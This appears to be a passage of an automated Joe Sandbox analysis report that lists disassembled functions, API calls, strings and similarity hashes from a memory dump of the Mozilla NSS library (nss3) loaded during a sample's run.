                                                              • API ID: memcmp$sqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 1135338897-598938438
                                                              • Opcode ID: 595db922293fd5f5b706edd7af9a151f0f794bf06d41063c8307b774464e3a92
                                                              • Instruction ID: b952736a6f84e32db5f948f22c573f81a84c0cf7663f49b6a2db853dc90ca59d
                                                              • Opcode Fuzzy Hash: 595db922293fd5f5b706edd7af9a151f0f794bf06d41063c8307b774464e3a92
                                                              • Instruction Fuzzy Hash: B1314034A4865A8BE700CF288AD4B6FBBA6AF41314B4D8004EE481B282D371FC30C3D2
                                                              Function 6D0C0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6D0C0BDE), ref: 6D0C0DCB
                                                              • strrchr.VCRUNTIME140(00000000,0000005C,?,6D0C0BDE), ref: 6D0C0DEA
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6D0C0BDE), ref: 6D0C0DFC
                                                              • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6D0C0BDE), ref: 6D0C0E32
                                                              Strings
                                                              • %s incr => %d (find lib), xrefs: 6D0C0E2D
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: strrchr$Print_stricmp
                                                              • String ID: %s incr => %d (find lib)
                                                              • API String ID: 97259331-2309350800
                                                              • Opcode ID: ea8b2ddb3a4601feba0aa27ea0a53ac644c77eef5f04e798c621eeba68baf854
                                                              • Instruction ID: 7980165adaa48971f15d34ff5ce7b5bf8423b04ffe9fe39e2fa869d202fa59c3
                                                              • Opcode Fuzzy Hash: ea8b2ddb3a4601feba0aa27ea0a53ac644c77eef5f04e798c621eeba68baf854
                                                              • Instruction Fuzzy Hash: BB01D8B1A446149FE7208F669C45F2B73ECDF45A49B05442DEA09D3242E7B1ED14CAE2
                                                              Function 6D069C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D069CF2
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6D069D45
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D069D8B
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6D069DDE
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 3168844106-0
                                                              • Opcode ID: bcce4ab7492f74ec96f5875010a5481b048512298a9882ab522f51773ec35ce3
                                                              • Instruction ID: d3a3627c85552d1406029cd1ca5ca87c01683b0a87184d43456398599c94d716
                                                              • Opcode Fuzzy Hash: bcce4ab7492f74ec96f5875010a5481b048512298a9882ab522f51773ec35ce3
                                                              • Instruction Fuzzy Hash: FAA1A135A041418BFF199F34E98DB7F37B5BF86718F09002DE4069B640DB3AA942DB62
                                                              Function 6D17DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DE1B
                                                              • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6D17DE77
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                              • String ID:
                                                              • API String ID: 2700453212-0
                                                              • Opcode ID: 859c04b06c421bc06eee2da5628771573972707ba496043b49ac80cc352dd7f0
                                                              • Instruction ID: adb90d25d75d2e695ad7dfe4a269d7eb145364215baf5c183df7ea84b0233973
                                                              • Opcode Fuzzy Hash: 859c04b06c421bc06eee2da5628771573972707ba496043b49ac80cc352dd7f0
                                                              • Instruction Fuzzy Hash: 66719870A04319CFCB20CF99C58079AB7B0FF99714F26806DD9596B329DBB0A902CF90
                                                              Function 6D0CEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32 ref: 6D0CEDFD
                                                              • calloc.MOZGLUE(00000001,00000000), ref: 6D0CEE64
                                                              • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6D0CEECC
                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6D0CEEEB
                                                              • free.MOZGLUE(?), ref: 6D0CEEF6
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ErrorValuecallocfreememcpy
                                                              • String ID:
                                                              • API String ID: 3833505462-0
                                                              • Opcode ID: 3515ec2a634ad93496372190e10bb1c263f1d2ba5d5460196b0d70ed1b7d1966
                                                              • Instruction ID: a2da2757b8991c1edf26df0fed29444e719eb75400a2f4840cb35d84c5bb869c
                                                              • Opcode Fuzzy Hash: 3515ec2a634ad93496372190e10bb1c263f1d2ba5d5460196b0d70ed1b7d1966
                                                              • Instruction Fuzzy Hash: 8E31D0B19046019BF7219F28CC46B6F7BF4FB46388F450528ED5AC7251E731E914CBA2
                                                              Function 6D0D1DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6D0D1E0B
                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6D0D1E24
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0D1E3B
                                                              • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6D0D1E8A
                                                              • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6D0D1EAD
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Error$Choice_DecodeTimeUtil
                                                              • String ID:
                                                              • API String ID: 1529734605-0
                                                              • Opcode ID: 5abffe39f9d7bf95ba0d4700b5d8e6f21a0ef4b6d151ea3b17df42533300e844
                                                              • Instruction ID: 5271ec972130d0db00687ef2ae55f39bab3eefe7692b741a6021fe833765dd20
                                                              • Opcode Fuzzy Hash: 5abffe39f9d7bf95ba0d4700b5d8e6f21a0ef4b6d151ea3b17df42533300e844
                                                              • Instruction Fuzzy Hash: 96212572E08311ABE7018F68DC40B5F73E5AB84328F458639EE6957384EB30DA0587D3
                                                              Function 6D0DAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_ArenaMark_Util.NSS3(00000000,?,6D0D3FFF,00000000,?,?,?,?,?,6D0D1A1C,00000000,00000000), ref: 6D0DADA7
                                                                • Part of subcall function 6D1314C0: TlsGetValue.KERNEL32 ref: 6D1314E0
                                                                • Part of subcall function 6D1314C0: EnterCriticalSection.KERNEL32 ref: 6D1314F5
                                                                • Part of subcall function 6D1314C0: PR_Unlock.NSS3 ref: 6D13150D
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6D0D3FFF,00000000,?,?,?,?,?,6D0D1A1C,00000000,00000000), ref: 6D0DADB4
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,6D0D3FFF,?,?,?,?,6D0D3FFF,00000000,?,?,?,?,?,6D0D1A1C,00000000), ref: 6D0DADD5
                                                                • Part of subcall function 6D12FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D128D2D,?,00000000,?), ref: 6D12FB85
                                                                • Part of subcall function 6D12FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D12FBB1
                                                              • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6D1F94B0,?,?,?,?,?,?,?,?,6D0D3FFF,00000000,?), ref: 6D0DADEC
                                                                • Part of subcall function 6D12B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D2018D0,?), ref: 6D12B095
                                                              • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D0D3FFF), ref: 6D0DAE3C
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                              • String ID:
                                                              • API String ID: 2372449006-0
                                                              • Opcode ID: 1ab05bf00ce5c059837a80515eebb7a880664e530ad5fd3a5b3b7d6ac55d82fb
                                                              • Instruction ID: 4188c3b3a2838d675a4cbf2228af0a25def97b100f8281d460f63be48fae7b69
                                                              • Opcode Fuzzy Hash: 1ab05bf00ce5c059837a80515eebb7a880664e530ad5fd3a5b3b7d6ac55d82fb
                                                              • Instruction Fuzzy Hash: 03117832E043052FF7109B649C40F7F73F8DFA124CF05412AED1A96241FBA0A994C2E2
                                                              Function 6D0FCD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6D111E10: TlsGetValue.KERNEL32 ref: 6D111E36
                                                                • Part of subcall function 6D111E10: EnterCriticalSection.KERNEL32(?,?,?,6D0EB1EE,2404110F,?,?), ref: 6D111E4B
                                                                • Part of subcall function 6D111E10: PR_Unlock.NSS3 ref: 6D111E76
                                                              • free.MOZGLUE(?,6D0FD079,00000000,00000001), ref: 6D0FCDA5
                                                              • PK11_FreeSymKey.NSS3(?,6D0FD079,00000000,00000001), ref: 6D0FCDB6
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6D0FD079,00000000,00000001), ref: 6D0FCDCF
                                                              • DeleteCriticalSection.KERNEL32(?,6D0FD079,00000000,00000001), ref: 6D0FCDE2
                                                              • free.MOZGLUE(?), ref: 6D0FCDE9
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                              • String ID:
                                                              • API String ID: 1720798025-0
                                                              • Opcode ID: 10166f59a04adbe4403e874ca2a22ee3244f719c5c03e03add88e44728cc3d3f
                                                              • Instruction ID: 1a0a05e27cc1ff59ce9874af23d939d4eb4dbc57f20e2a99c4a36dc66b984991
                                                              • Opcode Fuzzy Hash: 10166f59a04adbe4403e874ca2a22ee3244f719c5c03e03add88e44728cc3d3f
                                                              • Instruction Fuzzy Hash: 5811C2B2A04206ABEF008E65EC86F6BB7ACFF046687000131FE1987505E732E475C7E1
                                                              Function 6D162D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6D165B40: PR_GetIdentitiesLayer.NSS3 ref: 6D165B56
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D162D9C
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              • PR_EnterMonitor.NSS3(?), ref: 6D162DB2
                                                              • PR_EnterMonitor.NSS3(?), ref: 6D162DCF
                                                              • PR_ExitMonitor.NSS3(?), ref: 6D162DF2
                                                              • PR_ExitMonitor.NSS3(?), ref: 6D162E0B
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                              • String ID:
                                                              • API String ID: 1593528140-0
                                                              • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                              • Instruction ID: 6a685f989d6e3be84acd244e6a7802560cd98657aeb53be4d8554467745fac9b
                                                              • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                              • Instruction Fuzzy Hash: 0C0104B5A042405FEB308F29FC00BC7B7A5EF41318F010434EA598B215D672F83186A3
                                                              Function 6D1EBDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6D1E7AFE,?,?,?,?,?,?,?,?,6D1E798A), ref: 6D1EBDC3
                                                              • free.MOZGLUE(?,?,6D1E7AFE,?,?,?,?,?,?,?,?,6D1E798A), ref: 6D1EBDCA
                                                              • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6D1E7AFE,?,?,?,?,?,?,?,?,6D1E798A), ref: 6D1EBDE9
                                                              • free.MOZGLUE(?,00000000,00000000,?,6D1E7AFE,?,?,?,?,?,?,?,?,6D1E798A), ref: 6D1EBE21
                                                              • free.MOZGLUE(00000000,00000000,?,6D1E7AFE,?,?,?,?,?,?,?,?,6D1E798A), ref: 6D1EBE32
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: free$CriticalDeleteDestroyMonitorSection
                                                              • String ID:
                                                              • API String ID: 3662805584-0
                                                              • Opcode ID: ae52404ec5ca9a5eeafb240d7acf5a4b94204bef3aa1b883e142d9481bac6172
                                                              • Instruction ID: 93ee3c2219bc67a837d04e10b3403c37b3cd6ecf4639561fa44925d96ddcbfa1
                                                              • Opcode Fuzzy Hash: ae52404ec5ca9a5eeafb240d7acf5a4b94204bef3aa1b883e142d9481bac6172
                                                              • Instruction Fuzzy Hash: 0611B0F99046019FDF31CF29D94EB033BB5BF6A658B460069E50A97220E771A418CBD2
                                                              Function 6D1E7C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_Free.NSS3(?), ref: 6D1E7C73
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D1E7C83
                                                              • malloc.MOZGLUE(00000001), ref: 6D1E7C8D
                                                              • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6D1E7C9F
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E7CAD
                                                                • Part of subcall function 6D199BF0: TlsGetValue.KERNEL32(?,?,?,6D1E0A75), ref: 6D199C07
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                              • String ID:
                                                              • API String ID: 105370314-0
                                                              • Opcode ID: 910b42a0ef2ac95366617a6231aa9a4eeeee135025c2490a1136b71e421ebccb
                                                              • Instruction ID: c3d67d417f0c06188597eb9c030518fa3ba9d44ba2ce2b20518228403d8d72ce
                                                              • Opcode Fuzzy Hash: 910b42a0ef2ac95366617a6231aa9a4eeeee135025c2490a1136b71e421ebccb
                                                              • Instruction Fuzzy Hash: 0AF0A9F1D18A167BEB00AF3AAC099177B9CAF042A4B018426E80AC7201EB75E110CAE5
                                                              Function 6D1EADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteCriticalSection.KERNEL32(6D1EA6D8), ref: 6D1EAE0D
                                                              • free.MOZGLUE(?), ref: 6D1EAE14
                                                              • DeleteCriticalSection.KERNEL32(6D1EA6D8), ref: 6D1EAE36
                                                              • free.MOZGLUE(?), ref: 6D1EAE3D
                                                              • free.MOZGLUE(00000000,00000000,?,?,6D1EA6D8), ref: 6D1EAE47
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: free$CriticalDeleteSection
                                                              • String ID:
                                                              • API String ID: 682657753-0
                                                              • Opcode ID: 499932af1cb82078c28bed91cfcaedea1621e304068c2e5d3c4721d0e1ee755c
                                                              • Instruction ID: 49d7243a71aed6a97d43cd18c3af4a02f2f5a59dceae9178de3135ce92c29779
                                                              • Opcode Fuzzy Hash: 499932af1cb82078c28bed91cfcaedea1621e304068c2e5d3c4721d0e1ee755c
                                                              • Instruction Fuzzy Hash: A4F09675000A02ABCB108F68D80DE577778BF86B797140368F52A83540E731E125D7D5
                                                              Function 6D077C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D077D35
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: sqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 632333372-598938438
                                                              • Opcode ID: 8c35a254de825f2c7b0e58aa9815d80f74fa82226e16bf8cfd04549ce988b366
                                                              • Instruction ID: b396fb401ff1daece2bc65ca60c97b226f8ca96d843fe28785354c3c003da133
                                                              • Opcode Fuzzy Hash: 8c35a254de825f2c7b0e58aa9815d80f74fa82226e16bf8cfd04549ce988b366
                                                              • Instruction Fuzzy Hash: 7C312871E4422997D720CF9DC880ABEBBF2FFC8345B5541A9E545BB282D270DC41C7A8
                                                              Function 6D066C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6D066D36
                                                              Strings
                                                              • %s at line %d of [%.10s], xrefs: 6D066D2F
                                                              • database corruption, xrefs: 6D066D2A
                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D066D20
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
